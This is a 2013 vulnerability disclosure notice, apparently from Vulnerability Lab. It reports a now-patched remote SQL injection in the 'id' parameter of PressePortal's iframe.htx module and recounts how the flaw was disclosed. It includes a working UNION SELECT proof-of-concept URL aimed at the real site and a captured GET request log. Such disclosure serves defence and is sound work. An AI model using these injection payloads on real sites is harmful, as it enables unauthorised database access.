News Document Title: ==================== PressePortal DE patched critical SQL Injection Vulnerability Release Date: ============= 2013-11-28 Laboratory Article: =================== Today the NewsAktuell - PressePortal in germany patched a critical remote sql injection web vulnerability by a fast hotfix. The web online-service contains government-, police-, official department-, international- and national- press articles or reports. The news presseportal is one of the most famous newsportal websites in germany with the newsaktuell.de team in the background. End of april 2013 Marco Onorati informed us with a short report about the issue. Our team notified the NewsAktuell PressePortal support by mail about the remote sql injection issue in a main module of the website services. Nobody responded to us (several mails), so we took the phone (initiative) and called the news-aktuell office. Shortly after my call they requested the data by phone and we transfered an advisory with images + resources to the administration of the helpdesk/dev team. Some hours later the issue has been patched by a hotfix of the newsaktuell development team. The vulnerability was located in the `../services/content` module and the vulnerable iframe.htx file. Remote attackers are able to inject own sql commands via GET method request by usage of the vulnerable `id` parameter. After the inject the website returns with a a obviously blank page. The source of the website impact the value and the sql statement executes in the application dbms. The issue is a classic remote sql injection bug. The security risk of the remote sql injection web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.7(+). Vulnerable Module(s): [+] services/content Vulnerable File(s): [+] iframe.htx Vulnerable Parameter(s): [+] id PoC: Remote SQL Injection http://www.presseportal.de/services/content/iframe.htx?id= b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true -- PoC Session Logs [GET] --- Status: 200[OK] GET http://www.presseportal.de/services/content/iframe.htx ?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[3145] Mime Type[text/html] Request Headers: Host[www.presseportal.de] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Cookie[PHPSESSID=emou1lkl2c3vin16agjg90eig1; PressePortalDeDst=portal6-pp.de; __utma=239002817.282394538.1385649109.1385649109.1385649109.1; __utmb=239002817.4.10.1385649109; __utmc=239002817; __utmz=239002817.1385649109.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=2%7C48; POPUPCHECK=1385735515782] Connection[keep-alive] Cache-Control[max-age=0] Response Headers: Date[Thu, 28 Nov 2013 14:52:27 GMT] Server[Apache] X-Powered-By[PHP/5.3.27] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Content-Type[text/html] Content-Length[3145] Connection[Keep-alive] Via[1.1 AN-0003011040777600] Refernce(s): http://www.presseportal.de/services/content/iframe.htx?id https://www.presseportal.de/services/content/iframe.htx?id Advisory: http://www.vulnerability-lab.com/get_content.php?id=1150